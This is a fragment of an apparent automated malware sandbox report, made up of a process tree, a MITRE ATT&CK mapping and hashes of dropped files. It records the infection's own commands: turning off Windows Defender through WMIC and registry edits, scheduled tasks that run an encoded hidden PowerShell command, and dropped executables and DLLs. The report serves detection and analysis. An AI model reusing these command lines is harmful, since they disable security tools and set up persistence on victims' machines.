                                                                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                                                                              PID:8372
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                                                                                  PID:8632
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                    /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                                                                      PID:8944
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                                                                                                          PID:7812
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                            15⤵
                                                                                                                                                                                                                                                                                                              PID:9708
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                                                                        PID:8196
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                                            PID:8860
                                                                                                                                                                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                                                                                                PID:9116
                                                                                                                                                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                                                                                                  PID:5600
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                                                PID:7008
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                                                    PID:6440
                                                                                                                                                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                                                                                                                        PID:8304
                                                                                                                                                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                                                                                                          PID:1508
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                      schtasks /CREATE /TN "gFYuXaFuQ" /SC once /ST 09:06:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                      PID:6120
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                      schtasks /run /I /tn "gFYuXaFuQ"
                                                                                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                                                                                        PID:6152
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                        schtasks /DELETE /F /TN "gFYuXaFuQ"
                                                                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                                                                          PID:4120
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                          schtasks /CREATE /TN "bRciptYQhTCMvEFWGJ" /SC once /ST 10:48:00 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nyFjvKGtfVGLAKAU\iXkrQovqyvDrylo\iXzqJFh.exe\" W8 /site_id 668658 /S" /V1 /F
                                                                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                          PID:10164
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                          schtasks /CREATE /TN "xsEpqqHAgqAwsAroz" /SC once /ST 04:09:35 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nyFjvKGtfVGLAKAU\PmsBVDuTBNtRlfz\XOtdouJ.exe\" za /site_id 668658 /S" /V1 /F
                                                                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                          PID:10180
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                          schtasks /DELETE /F /TN "bRciptYQhTCMvEFWGJ"
                                                                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                                                                            PID:312
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                                                                                                              PID:1876
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                                                                PID:2616
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                schtasks /CREATE /TR "rundll32 \"\STjmdXhOU\wECUgu.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ArGDBXWmyYtLacf" /V1 /F
                                                                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                PID:7448
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                schtasks /CREATE /TN "ArGDBXWmyYtLacf2" /F /xml "\STjmdXhOU\hVqqsfU.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                PID:8872
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\gW3dxKBy5GQ8WVxVOod2Q1cm.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\gW3dxKBy5GQ8WVxVOod2Q1cm.exe"
                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                            PID:7944
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                          schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                          PID:3176
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                          schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                          PID:5876
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\H8fwlmLpQ4hB0Sk0FFWoWqqG.exe
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\H8fwlmLpQ4hB0Sk0FFWoWqqG.exe"
                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                          PID:5956
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\Jb8p9LOS4HCDqifTwHGAmQ_5.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\Jb8p9LOS4HCDqifTwHGAmQ_5.exe"
                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                            PID:5948
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\Jb8p9LOS4HCDqifTwHGAmQ_5.exe
                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\Documents\Jb8p9LOS4HCDqifTwHGAmQ_5.exe
                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                PID:1196
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\9bpePsggeZvEMqgaVm2Gj2aW.exe
                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\9bpePsggeZvEMqgaVm2Gj2aW.exe"
                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                                PID:1232
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                    PID:5984
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                      taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                      PID:1072
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\ET0HnW_JnkLbJlXygrgWY7qA.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\ET0HnW_JnkLbJlXygrgWY7qA.exe"
                                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                                    PID:5760
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\lW8KaQL6NA26qxj4G5uVsjgV.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\lW8KaQL6NA26qxj4G5uVsjgV.exe"
                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                      PID:4276
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\lW8KaQL6NA26qxj4G5uVsjgV.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\lW8KaQL6NA26qxj4G5uVsjgV.exe"
                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                          PID:6884
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\42Ua4d5IZg2NFKJlqAcD7XU4.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\42Ua4d5IZg2NFKJlqAcD7XU4.exe"
                                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                                          PID:6316
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\GZFHwhk_1e3eiSp_7mdAu2xn.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\GZFHwhk_1e3eiSp_7mdAu2xn.exe"
                                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                                            PID:6288
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\1438179.scr
                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\1438179.scr" /S
                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                PID:4196
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\1639116.scr
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\1639116.scr" /S
                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                  PID:7348
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\6018829.scr
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\6018829.scr" /S
                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                    PID:7556
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\7876557.scr
                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\7876557.scr"
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                        PID:5096
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                        PID:4628
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                          PID:4676
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                          PID:5112
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\A927.exe
                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\A927.exe
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                            PID:6680
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                            PID:7672
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                PID:7732
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\E556.exe
                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\E556.exe
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                PID:7844
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\E556.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\E556.exe
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                    PID:7884
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                      icacls "C:\Users\Admin\AppData\Local\5a06daa0-910b-4d77-8f0e-0386f0e75370" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                      PID:7908
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                    PID:7416
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 24CF226F85D5C3FD2AC1C48A4985A7E1 C
                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                        PID:5332
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\255.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\255.exe
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                        PID:7608
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\233C.exe
                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\233C.exe
                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                          PID:9080
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\56D0.exe
                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\56D0.exe
                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                            PID:9248
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                            PID:9444
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                PID:6664

                                                                                                                                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                            Execution

                                                                                                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                                                                                            Persistence

                                                                                                                                                                                                                                                                                                                                                            Modify Existing Service

                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                            T1031

                                                                                                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                                                                                            Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                                                                                            Defense Evasion

                                                                                                                                                                                                                                                                                                                                                            Modify Registry

                                                                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                                                                            T1112

                                                                                                                                                                                                                                                                                                                                                            Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                            T1089

                                                                                                                                                                                                                                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                            T1497

                                                                                                                                                                                                                                                                                                                                                            File Permissions Modification

                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                            T1222

                                                                                                                                                                                                                                                                                                                                                            Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                            T1130

                                                                                                                                                                                                                                                                                                                                                            Credential Access

                                                                                                                                                                                                                                                                                                                                                            Credentials in Files

                                                                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                                                                            T1081

                                                                                                                                                                                                                                                                                                                                                            Discovery

                                                                                                                                                                                                                                                                                                                                                            Query Registry

                                                                                                                                                                                                                                                                                                                                                            4
                                                                                                                                                                                                                                                                                                                                                            T1012

                                                                                                                                                                                                                                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                            T1497

                                                                                                                                                                                                                                                                                                                                                            System Information Discovery

                                                                                                                                                                                                                                                                                                                                                            5
                                                                                                                                                                                                                                                                                                                                                            T1082

                                                                                                                                                                                                                                                                                                                                                            Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                            T1120

                                                                                                                                                                                                                                                                                                                                                            Collection

                                                                                                                                                                                                                                                                                                                                                            Data from Local System

                                                                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                                                                            T1005

                                                                                                                                                                                                                                                                                                                                                            Command and Control

                                                                                                                                                                                                                                                                                                                                                            Web Service

                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                            T1102

                                                                                                                                                                                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                            Downloads

                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                              f7dcb24540769805e5bb30d193944dce

                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                              e26c583c562293356794937d9e2e6155d15449ee

                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                              6b88c6ac55bbd6fea0ebe5a760d1ad2cfce251c59d0151a1400701cb927e36ea

                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                              cb5ad678b0ef642bf492f32079fe77e8be20c02de267f04b545df346b25f3e4eb98bb568c4c2c483bb88f7d1826863cb515b570d620766e52476c8ee2931ea94

                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                              4131e41fc9c7e4bf961bf214d2c8bf7f

                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                              80c2700536c046195b7b17615d3e2118dd1a95a0

                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                              e9023c79d3735b5202b6ca818009f1582edadf29248b2f1a73da7a227184cb22

                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                              acc097966ab2071d88f1f4d65c51994fa135afd0b11b83614187b633e0607ab8b18464291260715a757c8ae34d5b65a6ffcb25689f65774ab61bf494956cc45b

                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Sun060f31ba456a.exe.log
                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                              41fbed686f5700fc29aaccf83e8ba7fd

                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                              5271bc29538f11e42a3b600c8dc727186e912456

                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                              df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                              234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                              78709ec579b3389b803133efefab5136

                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                              d4fee1a7e0b057b227c1992187c823dafc5d3fed

                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                              dea0f84142dbd4a875e8ba6bc7cdfc9b40f7d604dd5c5fdb05f3f270064f58cb

                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                              d6112510bdb6b32d536d1fb4dddcdf4c2b4713dedd2a2e9e77e324a61ec8904dbf21b5165642652a3e149df0cf75cc1df3c514c87221542ffd3b35dbfa230c9a

                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                              78709ec579b3389b803133efefab5136

                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                              d4fee1a7e0b057b227c1992187c823dafc5d3fed

                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                              dea0f84142dbd4a875e8ba6bc7cdfc9b40f7d604dd5c5fdb05f3f270064f58cb

                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                              d6112510bdb6b32d536d1fb4dddcdf4c2b4713dedd2a2e9e77e324a61ec8904dbf21b5165642652a3e149df0cf75cc1df3c514c87221542ffd3b35dbfa230c9a

                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS0A3D1641\Sun060f31ba456a.exe
                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                              b39390c4c99cb81fceb07a8fc50c0ed8

                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                              5c8fd743dc6d3abc2e4f3c8e381c8f572d56acc1

